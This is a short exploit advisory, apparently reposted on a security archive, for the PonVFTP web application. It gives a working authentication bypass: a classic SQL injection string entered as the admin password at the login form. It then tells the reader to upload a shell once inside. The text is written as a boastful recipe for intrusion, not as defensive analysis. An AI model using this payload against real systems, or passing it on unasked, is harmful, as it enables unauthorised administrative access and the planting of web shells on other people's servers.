PonVFTP suffers from a remote SQL injection vulnerability that allows for authentication bypass. Once this is achieved, administrative privileges can be leveraged to upload a shell.
957de70f6881fa7d95c9f5ef49ab0ab8
in the name of allah
# Exploit Title: PonVFTP Bbypass Vulnerability
# Date: 15/1/2010
# Author:S2K9
# Site: www.soqor.net , www.xp10.me
# Software home: http://pongles.com/index.php
# Tested on: windows xp sp2
Dork :in u r dream
exploit : press login >>>
username : admin
password : 'or' 1=1
press in
yaaaaay u r in hehe
good look
go to browse and upload your shell
Greetz : R3d-D3v!L <<< my teacher and every Muslim hacker
________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!